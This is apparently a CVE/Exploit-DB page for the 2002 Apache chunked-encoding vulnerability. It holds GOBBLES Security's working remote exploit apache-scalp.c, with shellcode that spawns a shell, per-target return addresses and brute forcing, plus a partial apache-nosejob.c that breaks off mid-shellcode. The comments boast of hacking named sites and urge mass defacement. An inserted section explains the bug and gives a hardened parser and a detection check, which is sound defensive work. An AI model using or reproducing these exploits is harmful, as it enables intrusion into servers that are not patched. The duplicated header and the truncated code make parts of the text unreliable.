Related Weaknesses
CWE-ID | Weakness Name | Source
CWE Other | No information. |
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.5 | High | AV:N/AC:L/Au:N/C:P/I:P/A:P | [email protected]
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited.
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs, so the percentile is what lets you compare one CVE's EPSS score against the rest.
Exploit information
Exploit Database EDB-ID : 21559
Publication date : 2002-06-16 22h00 +00:00
Author : Gobbles Security
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/5033/info
When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.
**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.
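The description above names the mechanism (an unsigned chunk size read back as a signed value) without showing it. The following is an added example, not part of the EDB entry and not Apache's source: it reproduces the bug class in miniature, with a chunk-size line parsed as unsigned and then kept in a 32-bit signed int, the resulting negative length silently converted to a huge size_t at the memcpy() boundary, beside a parser that rejects such lines with an explicit bound, and a small wire-level check a proxy or IDS could apply. The function names, the 1 MiB limit and the sample chunk-size lines are this example's own choices; "ffffff6e" is what the exploit below actually sends (-146 printed with %x).

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern (an illustration of the bug class, not Apache's code):
 * the hex chunk-size line is parsed as an unsigned number and then kept in a
 * 32-bit signed int.  "ffffff6e" is 4294967150 unsigned, -146 signed. */
int32_t chunk_size_vulnerable(const char *line)
{
    return (int32_t)strtoul(line, NULL, 16);
}

/* The consumer then hands that int to a size_t parameter (memcpy, read...).
 * Returns the count the callee would actually see; no copy is performed. */
size_t bytes_memcpy_would_copy(int32_t len)
{
    return (size_t)len;            /* -146 -> SIZE_MAX - 145 */
}

/* Hardened parser.  Accumulates hex digits with a bound check on every digit
 * (so the value can never wrap), requires at least one digit, and allows only
 * a chunk extension (';'), CR/LF or end of string after the digits.
 * Returns 0 and stores the size in *out, or -1 on any violation. */
int chunk_size_safe(const char *line, size_t max_chunk, size_t *out)
{
    size_t val = 0, ndigits = 0;
    const char *p = line;

    while (isxdigit((unsigned char)*p)) {
        unsigned d = isdigit((unsigned char)*p)
                   ? (unsigned)(*p - '0')
                   : (unsigned)(tolower((unsigned char)*p) - 'a' + 10);
        if (val > (max_chunk >> 4))    /* val*16 would exceed the limit */
            return -1;
        val = (val << 4) | d;          /* cannot wrap: val*16 <= max_chunk */
        if (val > max_chunk)
            return -1;
        p++;
        ndigits++;
    }
    if (ndigits == 0)
        return -1;                     /* "", "-146", ";ext" ... */
    if (*p != '\0' && *p != ';' && *p != '\r' && *p != '\n')
        return -1;                     /* junk after the digits */
    *out = val;
    return 0;
}

/* Convenience wrapper: the parsed size, or -1 if chunk_size_safe() rejects. */
long chunk_size_or_minus1(const char *line, size_t max_chunk)
{
    size_t val = 0;
    return chunk_size_safe(line, max_chunk, &val) == 0 ? (long)val : -1L;
}

/* Wire-level check for a proxy or IDS: a chunk-size line whose value sets
 * bit 31 is exactly what an attack on a signed 32-bit parser looks like.
 * Returns 1 for anything a 2^31-1 limit rejects (negative-looking, oversized
 * or malformed), 0 for a well-formed size below 2^31. */
int chunk_size_looks_hostile(const char *line)
{
    size_t val = 0;
    return chunk_size_safe(line, 0x7fffffffu, &val) == 0 ? 0 : 1;
}

int main(void)
{
    const char *wire = "ffffff6e";    /* final chunk-size line apache-scalp sends */
    int32_t bad = chunk_size_vulnerable(wire);
    size_t n = 0;

    printf("vulnerable parser sees %s as %d -> memcpy length %zu\n",
           wire, (int)bad, bytes_memcpy_would_copy(bad));
    printf("safe parser: %s -> %s\n", wire,
           chunk_size_safe(wire, 1u << 20, &n) == 0 ? "accepted" : "rejected");
    printf("safe parser: \"5\\r\\n\" -> %s (%zu bytes)\n",
           chunk_size_safe("5\r\n", 1u << 20, &n) == 0 ? "accepted" : "rejected", n);
    printf("hostile? %s -> %d, 7fffffff -> %d\n", wire,
           chunk_size_looks_hostile(wire), chunk_size_looks_hostile("7fffffff"));
    return 0;
}
```

The point of the bound check inside the loop, rather than a single comparison after parsing, is that the accumulated value is never allowed to reach a state where the next shift could wrap; a parser that reads the whole line first and compares afterwards has already lost on a 64-digit line.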
/*
* apache-scalp.c
* OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
*
* ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
*
* BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
*
* ". . . and Doug Sniff said it was a hole in Epic."
*
* ---
* Disarm you with a smile
* And leave you like they left me here
* To wither in denial
* The bitterness of one who's left alone
* ---
*
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish. This vulnerability was recently rediscovered by a slew
* of researchers.
*
* The "experts" have already concurred that this bug...
* - Can not be exploited on 32-bit *nix variants
* - Is only exploitable on win32 platforms
* - Is only exploitable on certain 64-bit systems
*
* However, contrary to what ISS would have you believe, we have
* successfully exploited this hole on the following operating systems:
*
* Sun Solaris 6-8 (sparc/x86)
* FreeBSD 4.3-4.5 (x86)
* OpenBSD 2.6-3.1 (x86)
* Linux (GNU) 2.4 (x86)
*
* Don't get discouraged too quickly in your own research. It took us close
* to two months to be able to exploit each of the above operating systems.
* There is a peculiarity to be found for each operating system that makes the
* exploitation possible.
*
* Don't email us asking for technical help or begging for warez. We are
* busy working on many other wonderful things, including other remotely
* exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
* the community that those holes don't exist? We wonder who's paying her.
*
* This code is an early version from when we first began researching the
* vulnerability. It should spawn a shell on any unpatched OpenBSD system
* running the Apache webserver.
*
* We appreciate The Blue Boar's effort to allow us to post to his mailing
* list once again. Because he finally allowed us to post, we now have this
* very humble offering.
*
* This is a very serious vulnerability. After disclosing this exploit, we
* hope to have gained immense fame and glory.
*
* Testbeds: synnergy.net, monkey.org, 9mm.com
*
* Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
* bugs are great.
*
* [#!GOBBLES QUOTES]
*
* --- you just know 28923034839303 admins out there running
* OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
* weekend"
* --- "Five years without a remote hole in the default install". default
* package = kernel. if theo knew that talkd was exploitable, he'd cry.
* --- so funny how apache.org claims it's impossible to exploit this.
* --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
* --- I hope Theo doesn't kill himself
* --- heh, this is a middle finger to all those open source, anti-"m$"
* idiots... slashdot hippies...
* --- they rushed to release this exploit so they could update their ISS
* scanner to have a module for this vulnerability, but it doesnt even
* work... it's just looking for win32 apache versions
* --- no one took us seriously when we mentioned this last year. we warned
* them that moderation == no pie.
* --- now try it against synnergy :>
* --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
*
* xxxx this thing is a major exploit. do you really wanna publish it?
* oooo i'm not afraid of whitehats
* xxxx the blackhats will kill you for posting that exploit
* oooo blackhats are a myth
* oooo so i'm not worried
* oooo i've never seen one
* oooo i guess it's sort of like having god in your life
* oooo i don't believe there's a god
* oooo but if i sat down and met him
* oooo i wouldn't walk away thinking
* oooo "that was one hell of a special effect"
* oooo so i suppose there very well could be a blackhat somewhere
* oooo but i doubt it... i've seen whitehat-blackhats with their ethics
* and deep philosophy...
*
* [GOBBLES POSERS/WANNABES]
*
* --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
* ---
* [email protected] (low-level.net)
*
* GOBBLES Security
*
* [email protected]
* http://www.bugtraq.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/select.h> /* select(), fd_set */
#include <signal.h>
#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */
#define RET_ADDR_INC 512 /* step between return addresses in bruteforce mode */
/* Sent as the final chunk size. "%x" renders -146 as "ffffff6e"; Apache ends
 * up treating it as a negative length, which memcpy() receives as a huge
 * size_t. The exact value is tuned per target (see the delta in nosejob). */
#define MEMCPY_s1_OWADDR_DELTA -146
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
#define REP_POPULATOR 24 /* X-AAAA: headers carrying retaddr + zero bytes */
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24 /* X-CCCCCCC: headers carrying NOP sled + shellcode */
#define NOPCOUNT 1024
#define NOP 0x41 /* inc %ecx: harmless, printable, survives header parsing */
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
/* Offset of the 16-bit port placeholder (bytes 0x42 0x41) that main() patches
 * with our local port, in network byte order, before sending. */
#define SHELLCODE_LOCALPORT_OFF 30
/* OpenBSD/x86 shellcode: walks fds 0..255 calling getpeername() until it finds
 * the connection whose peer port equals our local port, dup2()s that fd onto
 * stdin/stdout/stderr, writes "\nok\n" back to us (the marker main() waits
 * for), then execve("/bin/sh"). */
char shellcode[] =
"\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
"\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
"\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
"\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
"\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
"\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
"\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
"\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";
struct {
char *type;
u_long retaddr;
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f },
{ "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa },
{ "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 },
{ "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae },
};
int main(int argc, char *argv[]) {
char *hostp, *portp;
char buf[512], *expbuf, *p; /* plain char: these go through str*/snprintf() */
int i, j, lport;
int sock;
int bruteforce, owned, progress;
u_long retaddr;
struct sockaddr_in sin, from;
if(argc != 3) {
printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
printf("\n--- --- - Potential targets list - --- ----\n");
printf("Target ID / Target specification\n");
for(i = 0; i < sizeof(targets)/sizeof(targets[0]); i++) /* not /8: struct is 16 bytes on 64-bit hosts */
printf("\t%d / %s\n", i, targets[i].type);
return -1;
}
hostp = strtok(argv[2], ":");
if((portp = strtok(NULL, ":")) == NULL)
portp = "80";
retaddr = strtoul(argv[1], NULL, 16);
if(retaddr < sizeof(targets)/sizeof(targets[0])) {
retaddr = targets[retaddr].retaddr;
bruteforce = 0;
}
else
bruteforce = 1;
srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {
/* skip invalid return adresses */
i = retaddr & 0xff;
if(i == 0x0a || i == 0x0d)
retaddr++;
else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
continue;
sock = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(hostp);
sin.sin_port = htons(atoi(portp));
if(!progress)
printf("\n[*] Connecting.. ");
fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror("connect()");
exit(1);
}
if(!progress)
printf("connected!\n");
/* Setup the local port in our shellcode */
socklen_t fromlen = sizeof(from);
if(getsockname(sock, (struct sockaddr *) & from, &fromlen) != 0) {
perror("getsockname()");
exit(1);
}
lport = ntohs(from.sin_port);
shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));
PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("\r\n");
}
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < REP_RET_ADDR; j++) {
*p++ = retaddr & 0xff;
*p++ = (retaddr >> 8) & 0xff;
*p++ = (retaddr >> 16) & 0xff;
*p++ = (retaddr >> 24) & 0xff;
}
PUT_BYTES(REP_ZERO, 0);
PUT_STRING("\r\n");
}
PUT_STRING("Transfer-Encoding: chunked\r\n");
/* One small valid chunk, then a chunk size of -146: "%x" renders it as
 * "ffffff6e", which Apache treats as a negative length (the bug itself). */
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA);
PUT_STRING(buf);
write(sock, expbuf, p - expbuf);
progress++;
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
memset(buf, 0, sizeof(buf));
sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
retaddr, (unsigned int)(p - expbuf), lport);
if(strlen(buf) < 74) /* pad to a fixed width; guard against underflow with a wide retaddr */
memset(buf + strlen(buf), ' ', 74 - strlen(buf));
puts(buf);
if(bruteforce)
putchar(';');
}
else
putchar((rand()%2)? 'P': 'p');
fflush(stdout);
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = EXPLOIT_TIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
break;
if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
printf("\nGOBBLE GOBBLE!@#%%)*#\n");
printf("retaddr 0x%lx did the trick!\n", retaddr);
sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");
write(sock, expbuf, strlen(expbuf));
owned++;
}
write(1, buf, n);
}
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
write(sock, buf, n);
}
}
if(!owned)
break;
}
free(expbuf);
close(sock);
if(owned)
return 0;
if(!bruteforce) {
fprintf(stderr, "Ooops.. hehehe!\n");
return -1;
}
}
return 0;
}
Exploit Database EDB-ID : 21560
Publication date : 2002-06-16 22h00 +00:00
Author : Gobbles Security
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/5033/info
When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.
**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.
/*
* apache-nosejob.c - Now with FreeBSD & NetBSD targets ;>
*
* !! THIS EXPLOIT IS NOW PRIVATE ON BUGTRAQ !!
*
* USE BRUTE FORCE ! "AUTOMATED SCRIPT KIDDY" ! USE BRUTE FORCE !
*
* YEZ!$#@ YOU CAN EVEN DEFACE BUGTRAQ.ORG!
*
* Your high priced security consultant's plane ticket: $1500
* Your high priced security consultant's time: $200/hour
* RealSecure nodes all over your company: $200,000
* Getting owned by 0day: Priceless
*
* * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR *
* If somebody could do us a big favor and contact Jennifer Garner and ask
* her to make a journey to Vegas this summer for Defcon, to hang out with
* the members of GOBBLES Security who are all huge fans of hers, we would
* be eternally grateful. We are 100% serious about this. We would love
* to have a chance to sit down and have a nice conversation with her during
* the conference -- something little to make our lives feel more complete.
*
* Just show her this picture, and she'll understand that we're not some
* crazy obsessive fanatical lunatics that she would want to avoid. ;-)
* http://phrack.org/summercon2002/GOBBLES_show.jpg
* We even promise to keep our clothes on!
*
* Thx to all those GOBBLES antagonizers. Your insults fuel our desire to
* work harder to gain more fame.
*
* This exploit brought to you by a tagteam effort between GOBBLES Security
* and ISS X-Forces. ISS supplied the silly mathematical computations and
* other abstract figures declaring the exploitation of this bug to be
* impossible, without factoring in the chance that there might be other
* conditions present that would allow exploitation. After the failure of
* ISS' Santa Claus, GOBBLES Security didn't want to disappoint the kids and
* the security consultants and have brought forth a brand new shiny toy for
* all to marvel at.
*
* GOBBLES Security Sex Force: A lot of companies like to let you know
* their employees have the biggest dicks. We're firm believers in the
* idea that it's not the size of the wave, but rather the motion of the
* ocean -- we have no choice anyway.
*
* 3APAPAPA said this can't be done on FreeBSD. He probably also thinks
* qmail can't be exploited remotely. Buzzz! There we go speaking through
* our asses again. Anyways we're looking forward to his arguments on why
* this isn't exploitable on Linux and Solaris. Lead, follow, or get the
* fuck out of the way.
*
* Weigh the chances of us lying about the Linux version. Hmm, well so far
* we've used a "same shit, different smell" approach on *BSD, so you could
* be forgiven for thinking we have no Linux version. Then bring in the
* reverse psychology factor of this paragraph that also says we don't have
* one. But we'd say all of the above to make you believe us. This starts to
* get really complicated.
*
* ---
* God knows I'm helpless to speak
* On my own behalf
* God is as helpless as me
* Caught in the negatives
* We all just do as we please
* False transmissions
* I hope God forgives me
* For my transgressions
*
* It's what you want
* To know no consequences
* It's what you need
* To fucking bleed
* It's all too much
* ---
*
* Changes:
* + can do hostname resolution
* + uses getopt()
* + works against freebsd and netbsd now
* + ability to execute custom commands when shellcode replies -- great for
* mass hacking
* + rand() value bitshifted for more randomness in our progress bar tongues
* + more targets ;> BUT REMEMBER BRUTE FORCE MODE!!!
* + [RaFa] complained that the first version didn't let him hack through
* proxies. New shellcode has been added for additional fun. It's real
* funky, monkey, do you trust? Didn't think so.
*
* Fun to know:
* + Most apache installations don't even log the attack
* + GOBBLES Security is not playing games anymore.
* + GOBBLES Security has more active members than w00w00.
* + w00w00.org is still vulnerable to this exploit.
* + w00w00 might release another AIM advisory soon about how evil the
* whole DMCA thing is. *yawn*
*
* Fun to do:
* + Spot the #openbsd operator who can figure out how to use this!
* + Join #snort and laugh at their inadequacies
* + Question the effectiveness of Project Honeynet, when they have yet
* to discover the exploitation of a single "0day" vulnerability in the
* wild. HURRY UP B0YZ 4ND H4CK Y0UR 0WN H0N3YP0TZ N0W W1TH 4LL Y0UR
* 0DAY T0 PR0V3 US WR0NG!!@# Dumb twats.
*
* 80% of #openbsd won't be patching Apache because:
* + "It's not in the default install"
* + "It's only uid nobody. So what?"
* + "Our memcpy() implementation is not buggy"
* + "I couldn't get the exploit to work, so it must not actually be
* exploitable. Stupid GOBBLES wasting my time with nonsense"
* + jnathan's expert advice to his peers is that "this is not much of
* a security issue" -- @stake + w00w00 + snort brain power in action!
*
* Testbeds: hotmail.com, 2600.com, w00w00.org, efnet.org, atstake.com,
* yahoo.com, project.honeynet.org, pub.seastrom.com
*
* !! NOTICE TO CRITICS !! NOTICE TO CRITICS !! NOTICE TO CRITICS !!
*
* If you're using this exploit against a vulnerable machine (that the
* exploit is supposed to work on, quit mailing us asking why apache-scalp
* doesn't work against Linux -- dumbasses) and it does not succeed, you
* will have to play with the r|d|z values and * BRUTEFORCE * BRUTEFORCE *
* * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE *
*
* We wrote this for ethical purposes only. There is such a thing as an
* "ethical hacker" right?
*
* This should make penetration testing _very_ easy. Go out and make some
* money off this, by exploiting the ignorance of some yahoo who will be
* easily ./impressed with your ability to use gcc. No, we won't provide
* you with precompiled binaries. Well, at least for *nix. ;-)
*
* * IMPORTANT ANNOUCEMENT * IMPORTANT ANNOUNCEMENT * IMPORTANT ANNOUCEMENT *
* --- GOBBLES Security is no longer accepting new members. We're now a
* closed group. Of course, we'll still share our warez with the
* community at large, but for the time we have enough members.
*
* Greets to our two newest members:
* -[RaFa], Ambassador to the Underworld
* -pr0ix, Director of Slander and Misinformation
*
* [#!GOBBLES@SECRET_SERVER QUOTES]
*
* --- i wont be surprised that when I return tomorrow morning the
* internet will have come to a grinding halt with people crying for
* medics
* --- the internet will be over in a couple of months
* --- nobody in #openbsd can get it to work... #netbsd people seem to be
* managing fine...
* --- they dont grasp the concept of the base address... i seriously
* thought this was the most kiddie friendly exploit ever released
* --- even bb could get it working. look at vuln-dev
* --- we have to try to bump that threatcon up a notch
* --- what the alldas url now? how many defacements appeared yet?
* --- we should do a poem entitled "default openbsd" and mention how
* it just sits there... inanimate... soon theo will be stripping the
* network code so not even gobkltz.c works... as theo's paranoia
* increases and he becomes out of sync with the real world, strange
* things start to happen with openbsd... CHANGELOG: "now also safe
* from the voices. 6 years without the screaming in the default
* install"
* --- i can port it to windows.. i can make a gui using mfc.. with
* a picture of the skull & crossbones
* --- Has anyone ever been caught by an IDS? I certainly never have.
* This one runs on many machines. It ports to HP-UX.
* --- strange how mr spitzner didn't know honeynet.org was owned
* --- an official openbsd mirror is still vulnerable? dear god they're
* out of it!
* --- I think we're finally famous.
* --- we're on the front page of securityfocus, and we didn't even have
* to deface them! too bad the article wasn't titled, "Hi BlueBoar!"
* --- we need GOBBLES group photos at defcon holding up signs that say
* "The Blue Boar Must Die"
* --- project.honeynet.org is _still_ vulnerable a day after the exploit
* was made public? hahaha!
* --- exploit scanner? www.google.com -- search for poweredby.gif + your
* *bsd of choice!
* --- i stopped taking my antipsychotics last night. say no 2 drugz!
* --- <GOBBLES> antiNSA -- HACKING IS NOT FOR YOU!!!!!!
* --- we wonder how much they'll like GeneralCuster.exe
* --- wonder if ISS will use our code in their "security assesment"
* audits, or if they'll figure out how to exploit this independantly.
* either way they're bound to make a lot of money off us, bastards.
* --- forget w00giving, this year itz thanksgiving.
* --- the traffic to netcraft.com/whats will be through the roof for the
* next few months!
* --- every company with a hub has been sold multiple realsensor units
* --- full disclosure is a necessary evil, so quit your goddamned whining.
* --- people just assume they know what we mean by "testbed"
* --- i can't believe that people still disbelieve in the existance of
* hackers... i mean, what is all this bullshit about people being
* shocked that hackers write programs to break into systems so that
* they can use those programs to break into systems? are their minds
* that small?
* --- we're far from done. . .
*
*/
/*
* apache-scalp.c
* OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
*
* ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
*
* BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
*
* ". . . and Doug Sniff said it was a hole in Epic."
*
* ---
* Disarm you with a smile
* And leave you like they left me here
* To wither in denial
* The bitterness of one who's left alone
* ---
*
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish. This vulnerability was recently rediscovered by a slew
* of researchers.
*
* The "experts" have already concurred that this bug...
* - Can not be exploited on 32-bit *nix variants
* - Is only exploitable on win32 platforms
* - Is only exploitable on certain 64-bit systems
*
* However, contrary to what ISS would have you believe, we have
* successfully exploited this hole on the following operating systems:
*
* Sun Solaris 6-8 (sparc/x86)
* FreeBSD 4.3-4.5 (x86)
* OpenBSD 2.6-3.1 (x86)
* Linux (GNU) 2.4 (x86)
*
* Don't get discouraged too quickly in your own research. It took us close
* to two months to be able to exploit each of the above operating systems.
* There is a peculiarity to be found for each operating system that makes the
* exploitation possible.
*
* Don't email us asking for technical help or begging for warez. We are
* busy working on many other wonderful things, including other remotely
* exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
* the community that those holes don't exist? We wonder who's paying her.
*
* This code is an early version from when we first began researching the
* vulnerability. It should spawn a shell on any unpatched OpenBSD system
* running the Apache webserver.
*
* We appreciate The Blue Boar's effort to allow us to post to his mailing
* list once again. Because he finally allowed us to post, we now have this
* very humble offering.
*
* This is a very serious vulnerability. After disclosing this exploit, we
* hope to have gained immense fame and glory.
*
* Testbeds: synnergy.net, monkey.org, 9mm.com
*
* Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
* bugs are great.
*
* [#!GOBBLES QUOTES]
*
* --- you just know 28923034839303 admins out there running
* OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
* weekend"
* --- "Five years without a remote hole in the default install". default
* package = kernel. if theo knew that talkd was exploitable, he'd cry.
* --- so funny how apache.org claims it's impossible to exploit this.
* --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
* --- I hope Theo doesn't kill himself
* --- heh, this is a middle finger to all those open source, anti-"m$"
* idiots... slashdot hippies...
* --- they rushed to release this exploit so they could update their ISS
* scanner to have a module for this vulnerability, but it doesnt even
* work... it's just looking for win32 apache versions
* --- no one took us seriously when we mentioned this last year. we warned
* them that moderation == no pie.
* --- now try it against synnergy :>
* --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
*
* xxxx this thing is a major exploit. do you really wanna publish it?
* oooo i'm not afraid of whitehats
* xxxx the blackhats will kill you for posting that exploit
* oooo blackhats are a myth
* oooo so i'm not worried
* oooo i've never seen one
* oooo i guess it's sort of like having god in your life
* oooo i don't believe there's a god
* oooo but if i sat down and met him
* oooo i wouldn't walk away thinking
* oooo "that was one hell of a special effect"
* oooo so i suppose there very well could be a blackhat somewhere
* oooo but i doubt it... i've seen whitehat-blackhats with their ethics
* and deep philosophy...
*
* [GOBBLES POSERS/WANNABES]
*
* --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
* ---
* [email protected] (low-level.net)
*
* GOBBLES Security
*
* [email protected]
* http://www.bugtraq.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/select.h> /* select(), fd_set */
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif
#define HOST_PARAM "apache-nosejob.c" /* The Host: field */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, now use another bug/backdoor/feature (hi Theo!) to gain instant r00t';\n"
#define RET_ADDR_INC 512
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
#define REP_POPULATOR 24
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
char shellcode[] =
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
"\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
"\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
"\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
